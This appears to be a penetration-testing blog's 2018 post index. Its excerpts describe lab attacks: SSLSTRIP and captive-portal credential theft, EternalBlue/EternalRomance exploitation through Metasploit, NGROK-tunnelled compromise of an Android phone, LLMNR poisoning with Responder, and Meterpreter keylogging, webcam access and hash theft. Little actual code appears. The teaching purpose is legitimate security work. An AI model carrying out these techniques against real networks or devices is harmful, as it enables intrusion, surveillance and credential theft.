Posts

Showing posts from 2018

Using MITMF with SSLSTRIP and Captive Portal options

Image
In this video we will try out a variation of the man-in-the-middle with SSLSTRIP attack that we performed previously. In MITMF, in addition to ARP spoofing and SSLSTRIP, we will also be using the Captive Portal option. Please review the videos listed below, if needed: Bettercap with SSLSTRIP attack - Does it still work ? SSLSTRIP attacks with Bettercap and MITMF - HSTS and Web browsers We saw in the previous videos that websites correctly configured for HSTS, can't be attacked using SSLSTRIP. On the other hand, at this moment, a lot of websites still don't use HSTS or have HSTS incorrectly configured - which leaves those websites vulnerable to man-in-the-middle and SSLSTRIP attacks. Because it is unlikely for a user to browse ONLY correctly configured HSTS websites; an attacker can redirect the SSLSTRIP vulnerable websites to a Captive Portal and trick the user into giving up credentials belonging to websites that can't be attacked directly (for example: social media

SSLSTRIP attacks - New Bettercap 2.x vs Old Bettercap 1.x

Image
During my previous two SSLSTRIP videos, I preferred to use the "old" Bettercap version 1.6.2, instead of the "new" Bettercap version 2.x. Bettercap version 1.6.2 is the version which is currently available into the Kali Linux repository. Bettercap version 2.x can be installed from the following GitHub link:  https://github.com/bettercap/bettercap In this video I will use the latest Bettercap version 2.11 to perform SSLSTRIP MITM attacks against sample HTTPS websites. These are the same websites that we tested with during the previous SSLSTRIP videos: Bettercap with SSLSTRIP attack - Does it still work ? SSLSTRIP attacks with Bettercap and MITMF - more info about HSTS and Web browsers Bettercap 2.x is an awesome tool, but unfortunately it seems to have a few shortcomings when it comes to SSLSTRIP. These SSLSTRIP-related issues were previously raised into the following post: https://github.com/bettercap/bettercap/issues/154 During this video we will experien

SSLSTRIP attacks with Bettercap and MITMF - more info about HSTS and Web browsers

Image
I've decided to make a follow-up video on SSLSTRIP and man-in-the-middle attacks, in order to clarify and emphasize a few things around HSTS and Web browsers. The client Web browser version seems to be sometimes overlooked when it comes to the overall HSTS protocol. In this video we use Bettercap and different client Web browsers, to simulate man-in-the-middle attacks against websites that are correctly HSTS configured. We will see that the attacks could be successful or not, depending on the Web browser version and capabilities. See below a list of browsers with HSTS capabilities ( Reference:  Wikipedia - HTTP_Strict_Transport_Security ): - Chromium and Google Chrome since version 4.0.211.0 - Firefox since version 4; with Firefox 17, Mozilla integrates a list of websites supporting HSTS. - Opera since version 12 - Safari as of OS X Mavericks - Internet Explorer 11 on Windows 8.1 and Windows 7 when KB 3058515 is installed - Microsoft Edge and Internet Explorer 11 on Wind

MS17-010 Vulnerability - New EternalBlue SMB module for Metasploit - Exploiting Windows 8.1

Image
In its July 2018 update, Metasploit has released a new EternalBlue module named: ms17_010_eternalblue_win8    The short description for this module reads: MS17-010 EternalBlue SMB remote Windows Kernel Pool Corruption for Win8+ The July Metasploit update releases can be found on this link. Of course, Metasploit already had an EternalBlue module which was called ms17_010_eternalblue , but this older module was compatible only with Windows 7 and Windows 2008 R2 (x64). On the other hand, the new  ms17_010_eternalblue_win8 is listed as being compatible with Windows 8.1, Windows 10 (selected builds) and Windows 2012 R2 (x64). Before watching my new video on exploiting Windows 8.1 with the new  ms17_010_eternalblue_win8 module, you might find useful reviewing my previous posts related to the EternalBlue exploit, which I list below: 1.   MS17-010 Vulnerability - Using EternalBlue exploit module in Metasploit 2. MS17-010 Vulnerability - EternalBlue exploit using a binary payload an

Bettercap with SSLSTRIP attack - Does it still work ?

Image
For a long time, performing a MITM attack with SSLSTRIP was relatively easy to implement. This situation changed after websites had started to use HSTS (HTTP Strict Transport Security). Using SSLSTRIP alone is powerless against HTTPS websites which correctly implement HSTS. On the other hand, many websites on the Internet DO NOT configure HSTS correctly. This misconfiguration still leaves them vulnerable to MITM attacks using SSLSTRIP, in particular conditions. In this video we will test Bettercap and SSLSTRIP against different categories of websites. All the tested websites use HTTPS, but they differ in the way they implement HSTS: - The first category of websites have HSTS correctly implemented and the HSTS status for each website is also preloaded into the Internet browser. (The website's HSTS status is known by the web browser, before the first access.) The test sites in the first category are: facebook.com, gmail.com and twitter.com - The second category of websites hav

Over the WAN simulation - hacking into an Android phone with NGROK and Metasploit

Image
This video is another "over the WAN" hacking simulation. This time we will use Kali Linux together with NGROK, Metasploit and reverse_http payload to hack into an Android phone. The test LG G2 Android phone will be connected to Internet via 4G. This video uses information that was presented into my previous posts. Please review the posts below, as needed: 1.  Over the WAN Penetration Testing LAB - Installing and using NGROK and NETCAT 2.  MS17-010 Vulnerability - Over the WAN LAB with NGROK - EternalBlue and EternalRomance exploits on Windows 10, Windows 7 and Windows 2018 R2 3.  Metasploit Tips - reverse_https vs reverse_tcp payloads  (also covers the "multihandler" exploit) 4.  Generating shellcode - using msfvenom to generate a binary payload Android application The Android application used in this video was downloaded from: https://apkpure.com/roll-balls-into-a-hole/com.andregal.android.billard This application was randomly chosen. Any other ap

MS17-010 Vulnerability - Over the WAN LAB with NGROK - EternalBlue and EternalRomance exploits on Windows 10, Windows 7 and Windows 2018 R2

Image
In this video we will use the "Over the WAN" LAB that was configured in the previous post, in order to exploit the MS17-010 Vulnerability. We will use the EternalBlue and EternalRomance / EternalChampion exploit modules in Metasploit, together with NGROK. This video will heavily use information that was presented in my previous posts. Please review the posts below, as needed: 1.  Over the WAN Penetration Testing LAB - Installing and using NGROK and NETCAT 2.  MS17-010 Vulnerability - Scanning using Metasploit on KALI Linux 3.  MS17-010 Vulnerability - Using EternalBlue exploit module in Metasploit 4.  Metasploit Tips - reverse_https vs reverse_tcp payloads (also covers the "multihandler" exploit) 5.  MS17-010 Vulnerability - New EternalRomance / EternalSynergy / EternalChampion SMB modules for Metasploit - Exploiting Windows10 and Windows2008R2 STDAPI In order to be able to use the "sysinfo", "getuid" and "ipconfig" co

Over the WAN Penetration Testing LAB - Installing and using NGROK and NETCAT

Image
In this video we will discuss some common challenges faced during external penetration testing exercises. We will then configure the LAB to simulate an "over the WAN" environment. We will install and configure NGROK, then we will see how port forwarding via the NGROK site might help in an "over the WAN" scenario. As we progress with the new LAB configuration, we will perform connectivity testing using NETCAT. NGROK NGROK is a multiplatform tunnelling, reverse proxy software that establishes secure tunnels from a public endpoint such as internet, to a locally running network service. Check the following link for more details about NGROK:   https://ngrok.com/product Sign up for a free NGROK account by using the following link:  https://dashboard.ngrok.com/user/signup In order to establish a TCP tunnel exposing port 80 on the local Kali Linux machine, we will use the following command: ./ngrok tcp 80 NETCAT NETCAT is a computer networking utility used

LLMNR and NBT-NS poisoning attack using Responder and MultiRelay

Image
In the previous post we discussed the basis for a LLMNR and NBT-NS attack and we showed this attack by using four Metasploit modules. In this new video we will continue to demonstrate the LLMNR and NBT-NS attack, but instead of Metasploit we will be using Laurent Gaffie's Responder script. Responder Responder is a Python script that listens for Link-Local Multicast Name Resolution (LLMNR), Netbios Name Service (NBT-NS) and Multicast Domain Name System (mDNS) broadcast messages. Responder is also a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.  More information about Responder and its related utilities can be found on Laurent Gaffie's Blog . The script can be downloaded from Github on:  https://github.com/lgandx/Responder The following options are available when running Responder: The following command was used to laun

LLMNR and NBT-NS poisoning attack using Metasploit

Image
In this video we will simulate a LLMNR and NBT-NS poisoning attack, we will collect user password hashes and then crack them. This type of attack is very common during internal penetration testing assessments for the following reasons: - it works well with any Windows OS version - it performs well in both wired and wireless internal networks - it has a good chance to succeed because LLMNR and NBT-NS (NetBIOS Name Service) queries are enabled by default on Windows hosts; their usage does not require any authentication and any system in the local network can respond to these queries - the risk of crashing network hosts or disrupting the network user activity is low The basis for this attack relies on the way a Windows OS host performs name resolution; usually the steps below are performed in order, until the name is resolved: 1. Hosts file on the local host is checked 2. The local DNS cache is checked 3. Name query is sent to DNS server 4. LLMNR query is sent via multicast 5.

Metasploit Tips - reverse_https vs reverse_tcp payloads

Image
In this video we will exploit a MS17-010 vulnerable computer, but instead of using the classic "reverse_tcp" payload, we will use the "reverse_https" payload. There are two main features which make the reverse_http and reverse_https payloads very useful: 1. These payloads are using http/https types of traffic and protocol inspecting firewalls usually allow http/https traffic while they might block other types of traffic. In addition, these payloads use the WinInet API and will leverage any proxy or authentication settings that the user has configured for Internet access. 2. These payloads deal well with cases when the compromised target has spotty Internet access. If the connection between "victim" and the "attacker" machine drops, then the payload will keep trying reconnecting back to the "attacker" computer. In the video we will exploit the target computer, then we will drop the Meterpreter session by interrupting network co

MS17-010 Vulnerability - New EternalRomance / EternalSynergy / EternalChampion SMB modules for Metasploit - Exploit Windows2012R2 and Windows2016

Image
In the previous post , we covered the two new MS17-010 EternalRomance / EternalSynergy / EternalChampion SMB Remote Windows Command/Code Execution modules that Metasploit released last month: auxiliary/admin/smb/ms17_010_command  and exploit/windows/smb/ms17_010_psexec One of the cool features for the new modules is that they are supposed to work with all Microsoft OS versions post-Windows 2000. Check this message on Twitter from zerosum0x0 - one of the modules' authors. Therefore, I wanted to test the new modules with newer Microsoft OS Server versions like Windows 2012 R2 and Windows 2016. As you will see in the video below, exploiting Windows 2012 R2 and Windows 2016 is similar to exploiting Windows 10. We will need non-admin user credentials in order to exploit successfully, because by default no named pipes are available when connecting anonymously. For learning purposes, I attempted to use the modules without specifying the credentials and I got the following error:

MS17-010 Vulnerability - New EternalRomance / EternalSynergy / EternalChampion SMB modules for Metasploit - Exploiting Windows10 and Windows2008R2

Image
Until early last month, Metasploit had only two modules related to the MS17-010 SMB vulnerability. The first module:  auxiliary/scanner/smb/smb_ms17_010 , is a scanner for detecting the MS17-010 vulnerability. We covered this module in a  previous post . The second module: exploit/windows/smb/ms17_010_eternalblue , is the MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption exploit. We also covered this exploit previously in a post here . The EternalBlue exploit was designed to work with Windows 7 and Windows Server 2008 R2 target computers, which is quite restrictive from an OS point of view. We also discussed previously the MS17-010  DoublePulsar exploit  which can be used with more  OSes; but this module doesn't come by default with Metasploit and it has to be downloaded and installed separately . Fortunately, last month Metasploit has released two long awaited new modules in relation to the MS17-010 vulnerability: auxiliary/admin/smb/ms17_010_command  and  explo

Quick Meterpreter and Metasploit tutorial - Stealing hashes and passwords, Keyloggers, Webcams and other post-exploitation modules

Image
I thought that it would be useful, for some readers, if we review some of the most commonly used post-exploitation commands in Meterpreter and Metasploit. This is the second video and we will discuss about stealing hashes and passwords, using keyloggers, accessing webcams and invoking other post-exploitation modules. The first part of this tutorial can be found here: Quick Meterpreter and Metasploit tutorial - Core, System, Networking and File System usual commands LAB details - VM names and IP addresses Kali6 (Kali Linux, attacker VM): 192.168.254.142 W7x64-1 (Windows 7, target VM): 192.168.254.70 W2008R21 (Windows 2008R2, Domain Controller): 192.168.254.99 Domain name: TESTLAB3 Domain users credentials: Administrator / P@ssw0rd testuser1 / P@ssword1 testuser2 / P@ssword1 Local Administrator on W7x64-1 credentials: WinLocalAdmin / P@ssw0rd Exploitation process The Windows 7 test machine is affected by the MS17-010 vulnerability. For exploitation, we will foll